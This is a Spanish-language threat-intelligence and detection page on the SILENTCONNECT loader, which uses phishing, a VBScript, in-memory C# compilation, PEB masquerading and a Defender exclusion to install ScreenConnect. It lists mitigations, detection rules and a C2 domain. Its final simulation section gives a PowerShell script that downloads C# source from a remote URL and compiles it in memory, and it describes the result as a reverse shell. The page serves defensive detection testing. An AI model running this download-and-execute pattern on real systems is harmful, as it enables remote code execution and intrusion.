Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
El informe detalla un cargador de múltiples etapas llamado SILENTCONNECT que se basa en un instalador VBScript, compilación en memoria de PowerShell de código C#, y suplantación de PEB para desplegar silenciosamente la herramienta de gestión remota ConnectWise ScreenConnect. El ataque comienza con un correo electrónico de phishing que lleva a las víctimas a través de una página CAPTCHA de Cloudflare Turnstile antes de servir la carga útil de VBScript. Ese script recupera un componente C# desde Google Drive, lo compila en memoria y luego descarga un MSI de ScreenConnect desde un dominio malicioso para establecer persistencia como un servicio de Windows. La campaña combina servicios de hosting de confianza con binarios que viven en el sistema para reducir su huella de detección.
Investigación
Elastic Security Labs identificó una cadena de alertas inusuales de Script de Windows que finalmente expusieron el archivo E-INVITE.vbs alojado en Cloudflare R2. El análisis mostró que el script lanzaba un comando de PowerShell que llamaba a curl.exe para obtener un archivo fuente de C# desde Google Drive, el cual luego era compilado y ejecutado directamente en memoria. El cargador utilizó NtAllocateVirtualMemory para reservar memoria ejecutable, aplicó suplantación de PEB, e insertó una exclusión de Windows Defender antes de descargar el instalador de ScreenConnect con curl y ejecutarlo a través de msiexec. La telemetría de red reveló que el cliente desplegado alcanzaba un punto de control C2 en bumptobabeco.top sobre el puerto TCP 8041.
Mitigación
Los equipos de seguridad deben vigilar líneas de comandos sospechosas de PowerShell que invoquen curl.exe, la creación de carpetas temporales en C:Temp, y compilaciones inusuales de Add-Type de código fuente C# descargado. La lógica de detección también debe considerar la suplantación de PEB señalando procesos cuyos valores de BaseDLLName o FullDllName no coincidan con la ruta del módulo real. El tráfico saliente hacia dominios desconocidos que albergan instaladores MSI debe ser bloqueado o analizado en detalle, y la ejecución de msiexec debe estar estrictamente controlada para fuentes no confiables. Las exclusiones de Windows Defender deben aplicarse solo mediante flujos de trabajo administrativos aprobados.
Respuesta
Si se observan estos indicadores, aislar inmediatamente el host afectado, matar el proceso malicioso, y eliminar el servicio de ScreenConnect instalado. Recoger evidencia forense incluyendo archivos temporales, el ensamblado .NET compilado, y cualquier paquete MSI descargado. Revertir cualquier exclusión no autorizada de Windows Defender y restaurar las configuraciones de UAC si fueron cambiadas. Luego, buscar en el entorno más amplio artefactos de cargador coincidentes y actualizar el contenido de detección con todos los IOC recién identificados.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef process fill:#ccffcc classDef malware fill:#ffdddd %% Nodes action_phishing["<b>Acción</b> – <b>Técnica</b>: T1566 Phishing<br/><b>Descripción</b>: Un correo electrónico de spearphishing entrega contenido malicioso."] class action_phishing action action_user_click["<b>Acción</b> – El usuario hace clic en enlace malicioso a la página de Turnstile de Cloudflare."] class action_user_click action malware_vbscript["<b>Malware</b> – Archivo VBScript<br/><b>Técnica</b>: T1059.005 Visual Basic<br/><b>Descripción</b>: Ejecuta un script de Visual Basic para lanzar más código."] class malware_vbscript malware tool_powershell["<b>Herramienta</b> – PowerShell<br/><b>Técnica</b>: T1059.001 PowerShell<br/><b>Descripción</b>: Ejecuta comandos de PowerShell para control del sistema."] class tool_powershell tool tool_curl["<b>Herramienta</b> – Curl<br/><b>Técnica</b>: T1570 Transferencia Lateral de Herramientas<br/><b>Descripción</b>: Recupera archivos de almacenamiento remoto (Google Drive)."] class tool_curl tool malware_compile["<b>Malware</b> – Compilación de C# en Memoria<br/><b>Técnica</b>: T1027.004 Compilar Después de la Entrega<br/><b>Descripción</b>: Compila código fuente C# directamente en memoria."] class malware_compile malware process_injection["<b>Proceso</b> – NtAllocateVirtualMemory<br/><b>Técnica</b>: T1055.002 Inyección de Proceso<br/><b>Descripción</b>: Asigna memoria en un proceso objetivo para la inyección de carga útil."] class process_injection process malware_peb["<b>Malware</b> – Suplantación de PEB<br/><b>Técnica</b>: T1036.011 Suplantación<br/><b>Descripción</b>: Sobrescribe BaseDLLName para aparecer como winhlp32.exe."] class malware_peb malware tool_cmstp["<b>Herramienta</b> – CMSTP<br/><b>Técnica</b>: T1218.003 Ejecución de Proxy de Binario del Sistema CMSTP<br/><b>Descripción</b>: Usa la interfaz COM de CMSTP para eludir UAC."] class tool_cmstp tool action_defender_exclusion["<b>Acción</b> – <b>Técnica</b>: T1564.012 Exclusiones de Ruta de Archivo<br/><b>Descripción</b>: Añade exclusión de Microsoft Defender para ejecutable malicioso."] class action_defender_exclusion action tool_screenconnect_msi["<b>Herramienta</b> – ScreenConnect MSI<br/><b>Técnica</b>: T1570 Transferencia Lateral de Herramientas<br/><b>Descripción</b>: Descarga instalador de administración remota."] class tool_screenconnect_msi tool tool_msiexec["<b>Herramienta</b> – Msiexec<br/><b>Técnica</b>: T1547.010 Arranque de Sesión Autoinicio Ejecución Monitores de Puerto<br/><b>Descripción</b>: Realiza instalación silenciosa del servicio ScreenConnect."] class tool_msiexec tool malware_screenconnect["<b>Malware</b> – Servicio ScreenConnect<br/><b>Técnica</b>: T1219 Herramientas de Acceso Remoto<br/><b>Descripción</b>: Persiste en el sistema y se conecta a comando y control."] class malware_screenconnect malware %% Connections action_phishing –>|conduce a| action_user_click action_user_click –>|descarga| malware_vbscript malware_vbscript –>|lanza| tool_powershell tool_powershell –>|utiliza| tool_curl tool_curl –>|obtiene fuente para| malware_compile malware_compile –>|carga en| process_injection process_injection –>|activa| malware_peb malware_peb –>|activa| tool_cmstp tool_cmstp –>|desencadena| action_defender_exclusion action_defender_exclusion –>|descarga| tool_screenconnect_msi tool_screenconnect_msi –>|instala vía| tool_msiexec tool_msiexec –>|crea| malware_screenconnect "
Flujo de Ataque
Detecciones
Posible Phishing de Google Drive (vía proxy)
Ver
Posible Infiltración/Exfiltración de Datos/C2 a través de Servicios de Terceros/Herramientas (vía dns)
Ver
Posible Script de PowerShell Conteniendo Lolbin (vía powershell)
Ver
Posible Cadena LOLBAS (vía línea de comandos)
Ver
MsiExec Ejecutado por Proceso de Shell (vía línea de comandos)
Ver
Acceso Inicial Posible Mediante Phishing Con Extensiones de Archivo Como TLD (vía dns)
Ver
Posible Actividad de Comando y Control por Intento de Comunicación de Dominio de Software de Acceso Remoto (vía dns)
Ver
Dominio de Google Drive Fue Resuelto Por Proceso Sospechoso (vía consulta_dns)
Ver
Comando y Control Sospechoso por Solicitud DNS de Dominio de Nivel Superior (TLD) Inusual (vía dns)
Ver
Uso Sospechoso de CURL (vía línea de comandos)
Ver
Posible Ejecución de Msiexec de Archivos En Directorio No Común (vía línea de comandos)
Ver
IOCs (HashSha256) para detectar: Desde Invitación hasta Infección: Cómo SILENTCONNECT Entrega ScreenConnect
Ver
IOCs (Emails) para detectar: Desde Invitación hasta Infección: Cómo SILENTCONNECT Entrega ScreenConnect
Ver
IOCs (SourceIP) para detectar: Desde Invitación hasta Infección: Cómo SILENTCONNECT Entrega ScreenConnect
Ver
IOCs (DestinationIP) para detectar: Desde Invitación hasta Infección: Cómo SILENTCONNECT Entrega ScreenConnect
Ver
Ejecución de PowerShell Sospechosa con Descarga de Payload C# y Ejecución [Windows PowerShell]
Ver
Detección de Descarga y Ejecución del Instalador de ScreenConnect de SILENTCONNECT [Creación de Procesos de Windows]
Ver
Ejecución de Simulación
Prerrequisito: La Comprobación Previa de Telemetría y Línea de Base debe haber pasado.
Motivo: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y pretender generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados conducirán a un diagnóstico erróneo.
-
Narrativa de Ataque y Comandos:
- Recon Inicial y Recuperación de Payload – El atacante aloja un archivo de origen de C# malicioso en Google Drive. Usando PowerShell, descargan el archivo sin procesar a través de
Invoke-WebRequest. - Compilación en Memoria – El archivo de origen de C# descargado se compila directamente en memoria con
Add-Type -ReferencedAssemblies 'Microsoft.CSharp' -TypeDefinition $src. - Ejecución – El tipo .NET resultante se instancia y su método
Run()es invocado, estableciendo una shell inversa. - Ofuscación – La línea de comandos se lanza con
-ExecutionPolicy Bypasspara evitar bloqueos de políticas, coincidiendo con las cadenas exactas que la regla monitorea.
- Recon Inicial y Recuperación de Payload – El atacante aloja un archivo de origen de C# malicioso en Google Drive. Usando PowerShell, descargan el archivo sin procesar a través de
-
Script de Prueba de Regresión:
# ------------------------------------------------- # Script simulado de adversario – activa la regla Sigma # ------------------------------------------------- # 1. Definir la URL remota del payload C# (enlace compartido de Google Drive) $payloadUrl = "https://drive.google.com/uc?export=download&id=YOUR_FILE_ID" # 2. Descargar el origen de C# en una variable $csharpSource = Invoke-WebRequest -Uri $payloadUrl -UseBasicParsing | Select-Object -ExpandProperty Content # 3. Compilar y cargar el payload en memoria Add-Type -ReferencedAssemblies 'Microsoft.CSharp' -TypeDefinition $csharpSource -Language CSharp # 4. Ejecutar el payload (asume clase nombrada "Payload" con método estático "Run") # ------------------------------------------------- -
Comandos de Limpieza:
# Eliminar cualquier archivo temporal (ninguno creado) y descargar el ensamblaje en memoria # PowerShell no proporciona una descarga directa; terminar el proceso si es necesario Stop-Process -Id $PID -Force